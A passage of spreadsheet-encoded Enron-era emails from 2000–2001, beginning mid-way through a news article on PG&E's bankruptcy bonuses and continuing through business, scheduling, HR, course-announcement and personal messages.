=20_x000D_
questions, is scheduled to issue a ruling June 18.=20_x000D_
Critics have slammed the utility's "management retention program" as an=20_x000D_
unwarranted payout to the same executive team responsible for steering PG&amp;E=_x000D_
=20_x000D_
into its worst-ever financial crisis.=20_x000D_
But the company insists that without extra incentives, corporate leaders=20_x000D_
would depart and thus slow PG&amp;E's return to creditworthiness.=20_x000D_
"It's a question of efficiency," said Allan Marks, a lawyer representing th=_x000D_
e=20_x000D_
11 companies comprising the creditors' committee in PG&amp;E's bankruptcy=20_x000D_
proceedings.=20_x000D_
"It's not a question of whether these people are good or bad managers," he=_x000D_
=20_x000D_
said. "It's simply more efficient to keep these people in place."=20_x000D_
Marks said that when PG&amp;E first proposed the bonuses last month, the=20_x000D_
creditors' committee quickly noted that the cash was a virtual handout to=_x000D_
=20_x000D_
about 226 top executives.=20_x000D_
PG&amp;E Chairman Robert Glynn and nearly two dozen other senior managers would=_x000D_
=20_x000D_
receive 100 percent of their salaries to stay on, while hundreds of other=_x000D_
=20_x000D_
employees would receive bonuses of between 25 and 75 percent of their=20_x000D_
salaries.=20_x000D_
After what Marks described as candid negotiations, he said PG&amp;E had agreed =_x000D_
to=20_x000D_
link the bonuses to a commitment that its reorganization plan be on the tab=_x000D_
le=20_x000D_
by the beginning of 2002.=20_x000D_
"This is one way that we can assure efficiency in the process," he said. "O=_x000D_
ur=20_x000D_
goal is to make sure the company operates as quickly as possible."=20_x000D_
But PG&amp;E's Low said that the creditors had actually requested only minor=20_x000D_
changes in wording and that the timing of a reorganization plan had never=_x000D_
=20_x000D_
really been in dispute.=20_x000D_
A reorganization plan is the blueprint for a company's eventual recovery fr=_x000D_
om=20_x000D_
bankruptcy.=20_x000D_
Glynn would receive a bonus of 100 percent of his $900,000 annual salary if=_x000D_
=20_x000D_
PG&amp;E's plan is submitted on time. If he misses the deadline, he would have =_x000D_
to=20_x000D_
make do with just two-thirds of that amount.=20_x000D_
While there is no reason to believe that PG&amp;E's managers would have dragged=_x000D_
=20_x000D_
their heels without piles of extra cash, Marks said it was common in=20_x000D_
bankruptcy cases for corporate leaders to receive an incentive to remain in=_x000D_
=20_x000D_
their jobs and seek a resolution to the company's difficulties.=20_x000D_
"We ended up with something that we think is fair," he said.=20_x000D_
The creditors' committee includes financial heavyweights Bank of America an=_x000D_
d=20_x000D_
Merrill Lynch, as well as power giants Enron Corp. and Dynegy Inc. The=20_x000D_
committee's actions set the tone for PG&amp;E's dealings with its thousands of=_x000D_
=20_x000D_
other creditors, who are owed more than $9 billion.=20_x000D_
Harvey Rosenfield, head of the Foundation for Taxpayer and Consumer Rights =_x000D_
in=20_x000D_
Santa Monica, said that by accepting the bonus plan for PG&amp;E's top brass, t=_x000D_
he=20_x000D_
creditors' committee had signaled that it would agree to almost anything th=_x000D_
at=20_x000D_
would help them recover outstanding costs.=20_x000D_
"The creditors are in this to get reimbursed fully," he said. "Their idea i=_x000D_
s=20_x000D_
to ultimately soak ratepayers for the entire cost of the bankruptcy."=20_x000D_
Marks said the creditors would seek nothing less than full payment of PG&amp;E'=_x000D_
s=20_x000D_
obligations. "We're very firm on this," he said.=20_x000D_
Full payment will only come if the bankruptcy court sells off some of PG&amp;E'=_x000D_
s=20_x000D_
assets, such as the utility's power lines or dams, or if consumers end up=_x000D_
=20_x000D_
paying surcharges on their monthly bills.=20_x000D_
To date, PG&amp;E has insisted that none of its assets are for sale.=20_x000D_
E-mail David Lazarus at dlazarus@sfchronicle.com.=20_x000D_
,2001 San Francisco Chronicle ? Page?A - 4=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
56% favor limits on electricity prices, poll finds=20_x000D_
Washington Post_x000D_
Tuesday, June 5, 2001=20_x000D_
,2001 San Francisco Chronicle=20_x000D_
URL:=20_x000D_
http://www.sfgate.com/cgi-bin/article.cgi?file=3D/chronicle/archive/2001/06=_x000D_
/05/M_x000D_
N212214.DTL=20_x000D_
Washington -- Most respondents to a Washington Post-ABC News poll released=_x000D_
=20_x000D_
yesterday agree with California Gov. Gray Davis that the federal government=_x000D_
=20_x000D_
should set limits on the wholesale price of electricity, which President Bu=_x000D_
sh=20_x000D_
has said he opposes amid the likelihood of rolling blackouts this summer in=_x000D_
=20_x000D_
the largest state.=20_x000D_
Of those polled, 56 percent said they favored price limits, even though it=_x000D_
=20_x000D_
was pointed out that such a measure could discourage development of new=20_x000D_
supplies. Forty percent said they opposed price caps, which Davis said he=_x000D_
=20_x000D_
would seek in federal court after Bush ruled out the idea during a face-to-=_x000D_
=20_x000D_
face m</t>
  </si>
  <si>
    <t>Sun, 17 Sep 2000 05:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'raa@blakes.com', 'sat@blakes.com'})</t>
  </si>
  <si>
    <t>KIDG</t>
  </si>
  <si>
    <t xml:space="preserve">Robert and Scott--- what should we do about this. Please call me at 713 853 _x000D_
5587 ._x000D_
----- Forwarded by Richard B Sanders/HOU/ECT on 09/17/2000 12:12 PM -----_x000D_
_x000D_
	Randy Petersen_x000D_
	09/15/2000 09:31 AM_x000D_
		 _x000D_
		 To: Dan Lyons/HOU/ECT@ECT, Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: KIDG_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Randy Petersen/HOU/ECT on 09/15/2000 _x000D_
09:30 AM ---------------------------_x000D_
_x000D_
_x000D_
"Mike Cunningham" &lt;mjc@chguk.com&gt; on 09/15/2000 09:04:39 AM_x000D_
To: &lt;cruinn@hotmail.com&gt;, &lt;randy.petersen@enron.com&gt;_x000D_
cc:  _x000D_
Subject: KIDG_x000D_
_x000D_
_x000D_
_x000D_
Gentlemen,_x000D_
?_x000D_
A copy of the letter sent today by fax and hard  copy to the trustees. I _x000D_
would be grateful if Randy could forward a copy to  Richard Sanders._x000D_
?_x000D_
Best regards,_x000D_
?_x000D_
Mike Cunningham_x000D_
 - Coach House-Kafus- claim for KIDG.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Feb 2001 06:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: deal</t>
  </si>
  <si>
    <t xml:space="preserve">Just heard from Matt - should only be one trade - I've killed 530557._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
Stephanie Piwetz   02/23/2001 01:24 PM_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: deal  _x000D_
_x000D_
Kate, _x000D_
_x000D_
TFS just shows one trade with Matt motley, we have two entered 530551.01, _x000D_
530557.01._x000D_
thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
530263.01_x000D_
Apb showed:  just ch cp to city of mcminnville &gt; OKAY_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 14:29:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rick.johnson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'karen.denne@enron.com', 'mary.clark@enron.com', 'terrie.james@enron.com'})</t>
  </si>
  <si>
    <t>Policy Change Notice - Draft</t>
  </si>
  <si>
    <t xml:space="preserve">Terrie, et.al;  attached is a draft communication that may need to be included with severance, vacation, and other HR policy change communications._x000D_
As submitted, this draft policy notice freezes educational / tuition reimbursements.  Comments and message preparation are appropriate.  _x000D_
HR Leadership review and determination is pending.  No circulation until confirmed.  Regards, Rj._x000D_
    </t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 08:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brodie@haas.berkeley.edu', 'hornbeck@haas.berkeley.edu', 'sinha@haas.berkeley.edu', 'dshah@haas.berkeley.edu', 'murthy@haas.berkeley.edu', 'ravinuta@haas.berkeley.edu', 'cmartine@haas.berkeley.edu', 'huey@haas.berkeley.edu', 'sundares@haas.berkeley.edu', 'sklarin@haas.berkeley.edu', 'pine@haas.berkeley.edu', 'motola@haas.berkeley.edu', 'kazi@haas.berkeley.edu', 'azhao@haas.berkeley.edu', 'yarak@haas.berkeley.edu', 'cummins@haas.berkeley.edu', 'dasovich@haas.berkeley.edu', 'lucas@haas.berkeley.edu', 'rashah@haas.berkeley.edu', 'kupiecki@haas.berkeley.edu', 'premkuma@haas.berkeley.edu', 'pestoni@haas.berkeley.edu', 'msmith@haas.berkeley.edu', 'magner@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>E291B-1 Speaking for Management</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
This is from Bill Sonnenschein, the instructor for E291B-1 Speaking for_x000D_
Management._x000D_
_x000D_
_x000D_
Hello all._x000D_
_x000D_
And welcome in advance._x000D_
_x000D_
I want to pass on some information to you to prepare you for the first_x000D_
class session.  Class will meet on February 3 &amp; 24, 2001, from 9:00 a.m. to_x000D_
6:00 p.m.  The time is very short for a speech course.  I am asking you to_x000D_
prepare a little before the first session, to assure you get as much as you_x000D_
can out of the course._x000D_
_x000D_
Please come to the first day of class with a prepared persuasive speech (a_x000D_
speech that moves the audience to action).  The speech should be three to_x000D_
five minutes in length, and on a topic you feel very strongly about.  I do_x000D_
not care if the topic concerns business.  It could be political, social,_x000D_
moral, or even spiritual.  The most important thing is that you believe_x000D_
strongly in the message.  Leaders must learn to speak "from the heart."_x000D_
The focus of the course will be on speaking in a business context, but it_x000D_
is important to speak with feeling first, and learn to transfer that skill_x000D_
to a business context.   I do not care if you write the speech out, or_x000D_
create an outline and rehearse giving the speech extemporaneously.  The_x000D_
idea is to be prepared.  I will talk about delivering from a manuscript as_x000D_
well as the advantages of extemporaneous speaking as part of one lecture._x000D_
_x000D_
You may also want to buy a blank video tape.  You will not need it till the_x000D_
second Saturday, and even then using it will be optional.  Videotaping_x000D_
speeches is an excellent learning tool, but can be counter-productive if_x000D_
students get too nervous doing it.  I never use tape the first class_x000D_
session, and you choose if you want to be taped the second session._x000D_
_x000D_
If you have any questions, please feel free to call me at 510-336-1239, or_x000D_
e-mail me at sonnen@haas.berkeley.edu._x000D_
_x000D_
Thanks.  I am looking forward to working with you._x000D_
_x000D_
Bill_x000D_
_x000D_
=======================================================_x000D_
William Sonnenschein_x000D_
Communications Group Faculty_x000D_
Haas School of Business_x000D_
University of California, Berkeley_x000D_
510-643-8005 (Office) or 510-336-1239 (Home)_x000D_
=======================================================_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 13:17:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ccates@mail.lbjs.com'})</t>
  </si>
  <si>
    <t>no i do not work for strip clubs!!!_x000D_
our 'in house' production department makes comercials_x000D_
for advertising companies; i.e. clubs, bars....and i_x000D_
did the voice work for them!  h-town IS the armpit of_x000D_
america.  i know, i've lived there all my life.  you_x000D_
cannot say it isn't dirty. especially after you see a_x000D_
beautiful clean place like austin. but i'm glad to know_x000D_
that there are people who still love houston too._x000D_
_x000D_
what's my stripper name?!! nice._x000D_
-cori_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; you think houston is the armpit of the world?  i love_x000D_
it hear.  the_x000D_
&gt; weather sucks in the summer, but other than that it_x000D_
is a blast.  so you_x000D_
&gt; do work for strip clubs huh?  that is interesting._x000D_
what is your_x000D_
&gt; stripper name?_x000D_
&gt;_x000D_
&gt; &gt;  -----Original Message-----_x000D_
&gt; &gt; From: 	ccates@mail.lbjs.com@ENRON_x000D_
&gt; &gt; [mailto:IMCEANOTES-_x000D_
ccates+40mail+2Elbjs+2Ecom+40ENRON@ENRON.com]  On_x000D_
&gt; &gt; Behalf Of Cori Cates &lt;ccates@mail.lbjs.com&gt;_x000D_
&gt; &gt; Sent:	Wednesday, May 30, 2001 10:33 AM_x000D_
&gt; &gt; To:	Lenhart, Matthew_x000D_
&gt; &gt; Subject:	RE:_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; hey there- how's it goin?_x000D_
&gt; &gt;_x000D_
&gt; &gt; 4th st. is sort-of away from all the college_x000D_
&gt; &gt; crowd...it's pretty cool, i like it.  if you were_x000D_
to go_x000D_
&gt; &gt; to 6th. 'the library' &amp; 'the aquarium' are good_x000D_
&gt; &gt; places. 'touche' is also pretty cool (flaming_x000D_
dr.pepper_x000D_
&gt; &gt; gimick)._x000D_
&gt; &gt; i work at 'lbjs broadcasting' there are six radio_x000D_
&gt; &gt; stations in the building. i work specifically for_x000D_
&gt; &gt; 101X.  it is an alternative rock station.  i also_x000D_
make_x000D_
&gt; &gt; some commercials; if you listen to the radio here-_x000D_
&gt; &gt; that's me talking on the 'showpalace' &amp; 'expose'_x000D_
&gt; &gt; commercials.- yes- they are strip clubs.(no_x000D_
&gt; &gt; affiliation) it also airs on 93.7fm._x000D_
&gt; &gt; how's it goin in the arm-pit of america?_x000D_
&gt; &gt; -cori:)_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; &gt; i forgot you had a wedding.  i don't go up to_x000D_
austin_x000D_
&gt; &gt; all that much.  i_x000D_
&gt; &gt; &gt; usually stay down here and go out.  where do you_x000D_
work_x000D_
&gt; &gt; up there again?  i_x000D_
&gt; &gt; &gt; am sure you told me, but i forgot.  where are the_x000D_
&gt; &gt; good places to hang_x000D_
&gt; &gt; &gt; out?  is it 4th st?_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt;  -----Original Message-----_x000D_
&gt; &gt; &gt; &gt; From: 	ccates@mail.lbjs.com@ENRON_x000D_
&gt; &gt; &gt; &gt; [mailto:IMCEANOTES-_x000D_
&gt; &gt; ccates+40mail+2Elbjs+2Ecom+40ENRON@ENRON.com]  On_x000D_
&gt; &gt; &gt; &gt; Behalf Of Cory Cates &lt;ccates@mail.lbjs.com&gt;_x000D_
&gt; &gt; &gt; &gt; Sent:	Tuesday, May 29, 2001 3:53 PM_x000D_
&gt; &gt; &gt; &gt; To:	Lenhart, Matthew_x000D_
&gt; &gt; &gt; &gt; Subject:	RE:_x000D_
&gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; i was kidding about your friends...besides- i_x000D_
&gt; &gt; &gt; &gt; definately do not have room to talk._x000D_
&gt; &gt; &gt; &gt; i guess you didn't remember, i have a "wedding"_x000D_
on_x000D_
&gt; &gt; &gt; &gt; saturday?  i have to be in h-town on fri. for_x000D_
the_x000D_
&gt; &gt; &gt; &gt; rehearsal.  sucks. you'll have fun though- do_x000D_
you_x000D_
&gt; &gt; come_x000D_
&gt; &gt; &gt; &gt; to austin a lot?  next time i'm in houston will_x000D_
&gt; &gt; &gt; &gt; probably be father's day._x000D_
&gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; i've had just about enough of this place for one_x000D_
&gt; &gt; day,_x000D_
&gt; &gt; &gt; &gt; so i'm going home now..._x000D_
&gt; &gt; &gt; &gt; have a good day_x000D_
&gt; &gt; &gt; &gt; -cori:)_x000D_
&gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; my friends are liars.  this past weekend was_x000D_
an_x000D_
&gt; &gt; &gt; &gt; anomaly.  it isn't bad_x000D_
&gt; &gt; &gt; &gt; &gt; to go out and party like a rock star every_x000D_
now and_x000D_
&gt; &gt; &gt; &gt; then.  i will be in_x000D_
&gt; &gt; &gt; &gt; &gt; austin this saturday night, so maybe we can_x000D_
get_x000D_
&gt; &gt; &gt; &gt; together in austin.  we_x000D_
&gt; &gt; &gt; &gt; &gt; will probably be at it pretty hard again.  i_x000D_
have_x000D_
&gt; &gt; a_x000D_
&gt; &gt; &gt; &gt; friend coming in_x000D_
&gt; &gt; &gt; &gt; &gt; from new orleans so he will want to hit 6th_x000D_
&gt; &gt; street._x000D_
&gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;  -----Original Message-----_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; From: 	ccates@mail.lbjs.com@ENRON_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; [mailto:IMCEANOTES-_x000D_
&gt; &gt; &gt; &gt; ccates+40mail+2Elbjs+2Ecom+40ENRON@ENRON.com]_x000D_
On_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; Behalf Of Cory Cates &lt;ccates@mail.lbjs.com&gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; Sent:	Tuesday, May 29, 2001 2:35 PM_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; To:	Lenhart, Matthew_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; Subject:	RE:_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; stop making excuses- your friends all said_x000D_
that_x000D_
&gt; &gt; &gt; &gt; you're_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; always very drunk every weekend. ha._x000D_
&gt; &gt; &gt; &gt; &gt; &gt; i'm back in austin.  i did have fun_x000D_
sat.night-_x000D_
&gt; &gt; it_x000D_
&gt; &gt; &gt; &gt; was_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; worth driving in for:)_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; i'm about a quart low today; i drove back on_x000D_
&gt; &gt; sunday_x000D_
&gt; &gt; &gt; &gt; &amp;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; spent the rest of the weekend on the lake._x000D_
i_x000D_
&gt; &gt; need_x000D_
&gt; &gt; &gt; &gt; to_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; go home._x000D_
&gt; &gt; &gt; &gt; &gt; &gt; why are you coming up this weekend again?_x000D_
for_x000D_
&gt; &gt; some_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; reason, i can't remember._x000D_
&gt; &gt; &gt; &gt; &gt; &gt; -cori_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; i remember you.  i was pretty drunk_x000D_
though._x000D_
&gt; &gt; &gt; &gt; &gt; &gt; hopefully i didn't make too_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; much of an ass out of myself.  we hit it_x000D_
&gt; &gt; really_x000D_
&gt; &gt; &gt; &gt; hard_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; that night for my_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; buddy's birthday.  how was your_x000D_
bachelorette_x000D_
&gt; &gt; &gt; &gt; party?_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; are you back in_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; austin now?_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  -----Original Message-----_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: 	ccates@mail.lbjs.com@ENRON_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; [mailto:IMCEANOTES-_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
ccates+40mail+2Elbjs+2Ecom+40ENRON@ENRON.com]_x000D_
&gt; &gt; On_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Behalf Of Cory Cates_x000D_
&lt;ccates@mail.lbjs.com&gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent:	Tuesday, May 29, 2001 11:56 AM_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To:	Lenhart, Matthew_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject:_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; hi matt...._x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -cori_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; (hopefully you remeber me)_x000D_
&gt; &gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 06:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>3/13 COB, heads up.</t>
  </si>
  <si>
    <t>SCL@BOUNDARY-BPA(T)BOUNDARY/JD #96018NF-BPA(T)JD/MALIN _x000D_
#94522F-SCL-EPMI-SEMPRA-PWX-BPA(T)MALIN/JD #341550F-BPA(T)JD/BCB _x000D_
#10030NF-PWX-BCPS01-BCH(T)BCB/SYS #257654NF-BCPS01-BCHYDRO@SYS     :   50MW _x000D_
HLH AT COB N/S.  Buy deal #s:  528046, 528048.  Sell deal #:  74885.2_x000D_
_x000D_
Seattle called in this schedule to BPA incorrectly.  They tried call BPA with _x000D_
the correction by their 2pm deadline, but got voice mail.  Therefore, if BPA _x000D_
does not accept the schedule change/correction, SCL will call it in on _x000D_
Real-time.  Even so, it should be transparent to RT._x000D_
_x000D_
Thanks, Donald.</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 02:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Exactly!  Mom sent me the pictures from the hospital with Anna.  I could _x000D_
easily be mistaken for her grandmother, I'm afraid.  I see pictures of myself _x000D_
and wonder who that older person is?!?  --Sally _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Cindy White" &lt;cwhite@viviance.com&gt; on 04/03/2001 09:14:22 AM_x000D_
To: "Sister Sally" &lt;sally.beck@enron.com&gt;_x000D_
cc:  _x000D_
Subject: FW: Truth in 13 words_x000D_
_x000D_
_x000D_
_x000D_
Sally..._x000D_
_x000D_
We got this yesterday from a friend of Richard's--it made me giggle...see_x000D_
you soon!_x000D_
_x000D_
Cindy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;&lt;_x000D_
 Inside every older person_x000D_
_x000D_
 is a younger person_x000D_
_x000D_
 wondering what the fuck happened._x000D_
  &gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Jun 2000 03:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'patricia.tlapek@enron.com'})</t>
  </si>
  <si>
    <t>Re: Followup</t>
  </si>
  <si>
    <t xml:space="preserve">Trish,_x000D_
_x000D_
I could not access his neural network site._x000D_
It requires access password._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Patricia Tlapek                           06/12/2000 03:57 PM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Followup_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Patricia Tlapek/HOU/ECT on 06/12/2000 _x000D_
03:57 PM ---------------------------_x000D_
_x000D_
_x000D_
Barcharts@aol.com on 06/09/2000 10:01:59 AM_x000D_
To: patricia.tlapek@enron.com, mike.roberts@enron.com_x000D_
cc:  _x000D_
Subject: Followup_x000D_
_x000D_
_x000D_
Good Morning,_x000D_
_x000D_
I enjoyed visiting you yesterday afternoon to discuss the opportunity at_x000D_
Enron.  Sounds exciting, challenging and a good use of a lot of my skills and_x000D_
experience.  I look forward to further talks, hopefully this coming week._x000D_
_x000D_
I mentioned a couple web sites and don't know if they came through clearly on_x000D_
the phone with my sore throat._x000D_
_x000D_
The neural network approach to timing can be found at_x000D_
http://www.pfr.com/ptonline/_x000D_
_x000D_
The introductory piece on technical analysis I wrote for Forbes.com and the_x000D_
glossary can be found at htttp://www.forbes.com/tool/html/00/Jun/0603/feat.htm_x000D_
_x000D_
I am also working with long time friend and neighbor Steve Nison with his_x000D_
site and you can see the first on line lesson for free at_x000D_
http://www.candlecharts.com/_x000D_
_x000D_
_x000D_
Have a nice weekend.  Hope to hear from you next week._x000D_
_x000D_
Bruce M. Kamich, CMT_x000D_
barcharts@aol.com_x000D_
732-463-8438_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 05:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Ken,_x000D_
_x000D_
I'm back.  Sorry for the delay.  It's been crazy here and I'm very backed up _x000D_
on emails especially the fun ones like this._x000D_
_x000D_
My brief moment in print (very brief) certainly hasn't gone to my head _x000D_
especially as an Enron  "B" teamer.  In response to your worker bee comment, _x000D_
I can certainly say "buzz" but not someone who can sell that many shares of _x000D_
stock!  You are the king._x000D_
_x000D_
Your last email was good and I'm not sure I can respond adequately but at _x000D_
least I didn't get help!_x000D_
_x000D_
You win......but you still owe me lunch._x000D_
_x000D_
Mike_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ken Rice@ENRON COMMUNICATIONS_x000D_
01/30/2001 07:55 AM_x000D_
To: Mike McConnell/HOU/ECT@ECT@ENRON_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
You're awfully quiet up there.  I guess getting your name in the Wall Street _x000D_
Journal has gone to your head and you can't respond to us lowly worker bees._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Mike McConnell@ECT_x000D_
	01/22/01 02:41 PM_x000D_
		_x000D_
		 To: Ken Rice/Enron Communications@ENRON COMMUNICATIONS@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
Ken,_x000D_
_x000D_
I had to respond.  _x000D_
_x000D_
Speaking of bitch....all of the Cornhusker fans are bitching about Stoops _x000D_
not  taking the head coach position at the Cleveland Browns or any other job _x000D_
that will get him out of their backyard.  By the way, Stoops just started _x000D_
working on his book "OU's 7th Football National Championship"; Chapter 3, Who _x000D_
are the Huskers?_x000D_
_x000D_
mike_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ken Rice@ENRON COMMUNICATIONS_x000D_
01/22/2001 10:13 AM_x000D_
To: Mike McConnell/HOU/ECT@ECT@ENRON_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
Luckily, Tom Osborn did not coach at my alma mater.  Our coach was Tom _x000D_
Osborne who, by the end of his career, made OU his bitch._x000D_
_x000D_
_x000D_
_x000D_
	Mike McConnell@ECT_x000D_
	01/22/01 07:16 AM_x000D_
		_x000D_
		 To: Ken Rice/Enron Communications@ENRON COMMUNICATIONS@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
Actually, I believe that may be correct.  I verified it in the new book by _x000D_
Tom Osborn,  How OU dominated my coaching career - my only losing record in _x000D_
Coaching.  It was a best seller.  _x000D_
m_x000D_
_x000D_
_x000D_
_x000D_
Ken Rice@ENRON COMMUNICATIONS_x000D_
01/19/2001 05:26 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT@ENRON_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
Excuse me, but I can't remember who it was who handed Oklahoma their worst _x000D_
loss in history. Could it be the ............HUSKERS?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Mike McConnell@ECT_x000D_
	01/19/01 03:09 PM_x000D_
		_x000D_
		 To: Ken Rice/Enron Communications@ENRON COMMUNICATIONS@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
Huskers drool over Sooners._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ken Rice@ENRON COMMUNICATIONS_x000D_
01/19/2001 09:14 AM_x000D_
To: Mike McConnell/HOU/ECT@ECT@ENRON_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
Huskers rule, Sooners drool._x000D_
_x000D_
_x000D_
_x000D_
	Mike McConnell@ECT_x000D_
	01/19/01 07:55 AM_x000D_
		_x000D_
		 To: Ken Rice/Enron Communications@ENRON COMMUNICATIONS@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
Thanks for the note.   Sooners rule.  We'll find time when things settle down._x000D_
m_x000D_
_x000D_
_x000D_
_x000D_
Ken Rice@ENRON COMMUNICATIONS_x000D_
01/19/2001 07:24 AM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Mike_x000D_
_x000D_
I see that we are scheduled to have lunch today.   I may have to postpone _x000D_
again, I'll let you know later this morning.  I am out all weekend and we _x000D_
have to have the final comments on the Analyst Presentation in by sunday _x000D_
night so I may be working over lunch.  Actually, I think we are in pretty _x000D_
good shape so I will probably be doing lunch but just don't be too mad if I _x000D_
have to cancel._x000D_
_x000D_
Ken_x000D_
_x000D_
PS  Your brother told me he went to 3 bowl games (when I found out that two _x000D_
of them were the galleryfurniture.com bowl and that one in Shreveport (I _x000D_
can't remember the name of it)) I realized he is a very, very sick college _x000D_
football fan._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
